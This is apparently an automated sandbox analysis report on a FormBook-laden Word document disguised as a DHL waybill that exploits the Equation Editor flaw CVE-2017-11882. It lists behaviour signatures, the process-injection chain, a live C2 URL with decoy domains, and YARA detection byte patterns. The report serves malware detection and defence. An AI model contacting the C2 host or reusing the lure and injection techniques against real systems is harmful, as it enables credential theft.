Play interactive tour

Edit tour

Windows Analysis Report Dhl Waybill Document.doc

Overview

General Information

Sample Name:	Dhl Waybill Document.doc
Analysis ID:	540376
MD5:	3e1816aaa393b5390f39b107a6d3b96d
SHA1:	6000cb396cd1a62f28ec7545ac9d05ee3117b9eb
SHA256:	e86affe17004b9e6f5eec414528a0029ca56da53981a13763c3c7ad8161df5f9
Tags:	DHLdocFormbook
Infos:
Most interesting Screenshot:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Multi AV Scanner detection for submitted file

Yara detected FormBook

Malicious sample detected (through community Yara rule)

Yara detected AntiVM3

Sigma detected: Droppers Exploiting CVE-2017-11882

System process connects to network (likely due to code injection or exploit)

Sigma detected: File Dropped By EQNEDT32EXE

Antivirus detection for URL or domain

Antivirus detection for dropped file

Sample uses process hollowing technique

Maps a DLL or memory area into another process

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Performs DNS queries to domains with low reputation

.NET source code contains potential unpacker

Injects a PE file into a foreign processes

Office equation editor drops PE file

Queues an APC in another process (thread injection)

Tries to detect virtualization through RDTSC time measurements

Modifies the context of a thread in another process (thread injection)

C2 URLs / IPs found in malware configuration

Queries the volume information (name, serial number etc) of a device

Yara signature match

Antivirus or Machine Learning detection for unpacked file

Document has an unknown application name

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Detected potential crypto function

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to call native functions

Potential document exploit detected (performs DNS queries)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Downloads executable code via HTTP

Contains functionality for execution timing, often used to detect debuggers

Document misses a certain OLE stream usually present in this Microsoft Office document type

Contains long sleeps (>= 3 min)

Document contains Microsoft Equation 3.0 OLE entries

Enables debug privileges

Document contains no OLE stream with summary information

Drops files with a non-matching file extension (content does not match file extension)

Found inlined nop instructions (likely shell or obfuscated code)

Potential document exploit detected (unknown TCP traffic)

Drops PE files

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Office Equation Editor has been started

Checks if the current process is being debugged

Potential document exploit detected (performs HTTP gets)

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Creates a process in suspended mode (likely to inject code)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

System is w7x64

WINWORD.EXE (PID: 788 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)

EQNEDT32.EXE (PID: 2420 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)

hkdf.exe (PID: 3004 cmdline: C:\Users\user\AppData\Roaming\hkdf.exe MD5: 14E865F28F1A02890383D2EC6638E6F9)

hkdf.exe (PID: 516 cmdline: C:\Users\user\AppData\Roaming\hkdf.exe MD5: 14E865F28F1A02890383D2EC6638E6F9)

hkdf.exe (PID: 2832 cmdline: C:\Users\user\AppData\Roaming\hkdf.exe MD5: 14E865F28F1A02890383D2EC6638E6F9)

explorer.exe (PID: 1764 cmdline: C:\Windows\Explorer.EXE MD5: 38AE1B3C38FAEF56FE4907922F0385BA)

control.exe (PID: 2016 cmdline: C:\Windows\SysWOW64\control.exe MD5: 9130377F87A2153FEAB900A00EA1EBFF)

cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.multidetoxhepatico.com/b62n/"], "decoy": ["childzplanet.com", "nine8culture.com", "yourfoodmenu.com", "nxhxyzjy.com", "nobelies.com", "baetsupreme.net", "indiadiscountedfares.com", "iconnect-design.com", "durston.store", "sweetcreationsbyjp.com", "ktieman.com", "getvirtualaddress.com", "cryptopoly-figures.com", "minismi2.com", "ricemoment.com", "regionalhomescommercial.com", "onelike.biz", "d22.group", "kwissleapp.com", "cindyrandband.com", "wolfgap.com", "ilogic8.com", "digitize-vision.com", "qiunianns.com", "tejpalmeet.com", "joywalkerconsultingllc.com", "daudcoffee.com", "muktobangla.xyz", "tendenciaofertas.com", "xuongkhophoanghuong.pro", "circleofdeth.com", "spoilthemrottenpets.com", "innasamudra.com", "pizzadelta.com", "jcmsomedia.com", "applelost-support.info", "ridvanyilmaz.com", "catherinehaskins.com", "fogelsingleywedding.com", "suddennnnnnnnnnnn20.xyz", "3leadsaday.xyz", "xn--salihzzmrt-icb8ec.com", "rdaniels2.com", "xn--growbb-fvab.com", "badkyker.quest", "sdoook.com", "bagways.com", "bullseyefunrun.com", "ff4c2myy0.xyz", "stardustfuel.com", "yiyuanpai.net", "permaculturemd.com", "prospectly.cloud", "myonchain.art", "atlasconcretos.com", "ghost.immo", "kondanginyuk.online", "mohamedtaher.xyz", "sxsxnt.com", "sofiarust.xyz", "playmayka.com", "eemtyx.com", "tashamurphy.com", "akoya-kyoto.com"]}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000006.00000002.461713601.00000000003C0000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000006.00000002.461713601.00000000003C0000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac6a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000006.00000002.461713601.00000000003C0000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ae9:$sqlite3step: 68 34 1C 7B E1 0x16bfc:$sqlite3step: 68 34 1C 7B E1 0x16b18:$sqlite3text: 68 38 2A 90 C5 0x16c3d:$sqlite3text: 68 38 2A 90 C5 0x16b2b:$sqlite3blob: 68 53 D8 7F 8C 0x16c53:$sqlite3blob: 68 53 D8 7F 8C
00000008.00000002.674851184.0000000000240000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000008.00000002.674851184.0000000000240000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac6a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000008.00000002.674851184.0000000000240000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ae9:$sqlite3step: 68 34 1C 7B E1 0x16bfc:$sqlite3step: 68 34 1C 7B E1 0x16b18:$sqlite3text: 68 38 2A 90 C5 0x16c3d:$sqlite3text: 68 38 2A 90 C5 0x16b2b:$sqlite3blob: 68 53 D8 7F 8C 0x16c53:$sqlite3blob: 68 53 D8 7F 8C
00000006.00000000.421161795.0000000000400000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000006.00000000.421161795.0000000000400000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac6a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000006.00000000.421161795.0000000000400000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ae9:$sqlite3step: 68 34 1C 7B E1 0x16bfc:$sqlite3step: 68 34 1C 7B E1 0x16b18:$sqlite3text: 68 38 2A 90 C5 0x16c3d:$sqlite3text: 68 38 2A 90 C5 0x16b2b:$sqlite3blob: 68 53 D8 7F 8C 0x16c53:$sqlite3blob: 68 53 D8 7F 8C
00000008.00000002.674778890.0000000000130000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000008.00000002.674778890.0000000000130000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac6a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000008.00000002.674778890.0000000000130000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ae9:$sqlite3step: 68 34 1C 7B E1 0x16bfc:$sqlite3step: 68 34 1C 7B E1 0x16b18:$sqlite3text: 68 38 2A 90 C5 0x16c3d:$sqlite3text: 68 38 2A 90 C5 0x16b2b:$sqlite3blob: 68 53 D8 7F 8C 0x16c53:$sqlite3blob: 68 53 D8 7F 8C
00000007.00000000.446591124.00000000097EC000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000007.00000000.446591124.00000000097EC000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x46c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x41b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x47c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0xac6a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000007.00000000.446591124.00000000097EC000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x6ae9:$sqlite3step: 68 34 1C 7B E1 0x6bfc:$sqlite3step: 68 34 1C 7B E1 0x6b18:$sqlite3text: 68 38 2A 90 C5 0x6c3d:$sqlite3text: 68 38 2A 90 C5 0x6b2b:$sqlite3blob: 68 53 D8 7F 8C 0x6c53:$sqlite3blob: 68 53 D8 7F 8C
00000008.00000002.674699956.0000000000100000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000008.00000002.674699956.0000000000100000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac6a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000008.00000002.674699956.0000000000100000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ae9:$sqlite3step: 68 34 1C 7B E1 0x16bfc:$sqlite3step: 68 34 1C 7B E1 0x16b18:$sqlite3text: 68 38 2A 90 C5 0x16c3d:$sqlite3text: 68 38 2A 90 C5 0x16b2b:$sqlite3blob: 68 53 D8 7F 8C 0x16c53:$sqlite3blob: 68 53 D8 7F 8C
00000006.00000002.461733467.0000000000400000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000006.00000002.461733467.0000000000400000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac6a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000006.00000002.461733467.0000000000400000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ae9:$sqlite3step: 68 34 1C 7B E1 0x16bfc:$sqlite3step: 68 34 1C 7B E1 0x16b18:$sqlite3text: 68 38 2A 90 C5 0x16c3d:$sqlite3text: 68 38 2A 90 C5 0x16b2b:$sqlite3blob: 68 53 D8 7F 8C 0x16c53:$sqlite3blob: 68 53 D8 7F 8C
00000006.00000000.421641009.0000000000400000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000006.00000000.421641009.0000000000400000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac6a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000006.00000000.421641009.0000000000400000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ae9:$sqlite3step: 68 34 1C 7B E1 0x16bfc:$sqlite3step: 68 34 1C 7B E1 0x16b18:$sqlite3text: 68 38 2A 90 C5 0x16c3d:$sqlite3text: 68 38 2A 90 C5 0x16b2b:$sqlite3blob: 68 53 D8 7F 8C 0x16c53:$sqlite3blob: 68 53 D8 7F 8C
00000004.00000002.425109708.00000000038F9000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000004.00000002.425109708.00000000038F9000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8e82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x30908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x30ca2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x508fb8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x509352:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14b95:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x3c9b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x515065:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14681:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x3c4a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x514b51:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14c97:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x3cab7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x515167:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x14e0f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x3cc2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x5152df:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x989a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x316ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x509d6a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
00000004.00000002.425109708.00000000038F9000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16fb9:$sqlite3step: 68 34 1C 7B E1 0x170cc:$sqlite3step: 68 34 1C 7B E1 0x3edd9:$sqlite3step: 68 34 1C 7B E1 0x3eeec:$sqlite3step: 68 34 1C 7B E1 0x517489:$sqlite3step: 68 34 1C 7B E1 0x51759c:$sqlite3step: 68 34 1C 7B E1 0x16fe8:$sqlite3text: 68 38 2A 90 C5 0x1710d:$sqlite3text: 68 38 2A 90 C5 0x3ee08:$sqlite3text: 68 38 2A 90 C5 0x3ef2d:$sqlite3text: 68 38 2A 90 C5 0x5174b8:$sqlite3text: 68 38 2A 90 C5 0x5175dd:$sqlite3text: 68 38 2A 90 C5 0x16ffb:$sqlite3blob: 68 53 D8 7F 8C 0x17123:$sqlite3blob: 68 53 D8 7F 8C 0x3ee1b:$sqlite3blob: 68 53 D8 7F 8C 0x3ef43:$sqlite3blob: 68 53 D8 7F 8C 0x5174cb:$sqlite3blob: 68 53 D8 7F 8C 0x5175f3:$sqlite3blob: 68 53 D8 7F 8C
00000006.00000002.461663216.0000000000240000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000006.00000002.461663216.0000000000240000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac6a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000006.00000002.461663216.0000000000240000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ae9:$sqlite3step: 68 34 1C 7B E1 0x16bfc:$sqlite3step: 68 34 1C 7B E1 0x16b18:$sqlite3text: 68 38 2A 90 C5 0x16c3d:$sqlite3text: 68 38 2A 90 C5 0x16b2b:$sqlite3blob: 68 53 D8 7F 8C 0x16c53:$sqlite3blob: 68 53 D8 7F 8C
00000007.00000000.453880697.00000000097EC000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000007.00000000.453880697.00000000097EC000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x46c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x41b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x47c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0xac6a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000007.00000000.453880697.00000000097EC000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x6ae9:$sqlite3step: 68 34 1C 7B E1 0x6bfc:$sqlite3step: 68 34 1C 7B E1 0x6b18:$sqlite3text: 68 38 2A 90 C5 0x6c3d:$sqlite3text: 68 38 2A 90 C5 0x6b2b:$sqlite3blob: 68 53 D8 7F 8C 0x6c53:$sqlite3blob: 68 53 D8 7F 8C
00000004.00000002.424345984.000000000291C000.00000004.00000001.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: hkdf.exe PID: 3004	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Click to see the 30 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
6.0.hkdf.exe.400000.9.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
6.0.hkdf.exe.400000.9.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac6a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
6.0.hkdf.exe.400000.9.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ae9:$sqlite3step: 68 34 1C 7B E1 0x16bfc:$sqlite3step: 68 34 1C 7B E1 0x16b18:$sqlite3text: 68 38 2A 90 C5 0x16c3d:$sqlite3text: 68 38 2A 90 C5 0x16b2b:$sqlite3blob: 68 53 D8 7F 8C 0x16c53:$sqlite3blob: 68 53 D8 7F 8C
6.2.hkdf.exe.400000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
6.2.hkdf.exe.400000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x7818:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7bb2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x138c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x133b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x139c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x13b3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x85ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1262c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9342:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x18db7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x19e6a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
6.2.hkdf.exe.400000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x15ce9:$sqlite3step: 68 34 1C 7B E1 0x15dfc:$sqlite3step: 68 34 1C 7B E1 0x15d18:$sqlite3text: 68 38 2A 90 C5 0x15e3d:$sqlite3text: 68 38 2A 90 C5 0x15d2b:$sqlite3blob: 68 53 D8 7F 8C 0x15e53:$sqlite3blob: 68 53 D8 7F 8C
6.2.hkdf.exe.400000.0.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
6.2.hkdf.exe.400000.0.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac6a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
6.2.hkdf.exe.400000.0.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ae9:$sqlite3step: 68 34 1C 7B E1 0x16bfc:$sqlite3step: 68 34 1C 7B E1 0x16b18:$sqlite3text: 68 38 2A 90 C5 0x16c3d:$sqlite3text: 68 38 2A 90 C5 0x16b2b:$sqlite3blob: 68 53 D8 7F 8C 0x16c53:$sqlite3blob: 68 53 D8 7F 8C
6.0.hkdf.exe.400000.9.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
6.0.hkdf.exe.400000.9.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x7818:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7bb2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x138c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x133b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x139c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x13b3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x85ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1262c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9342:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x18db7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x19e6a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
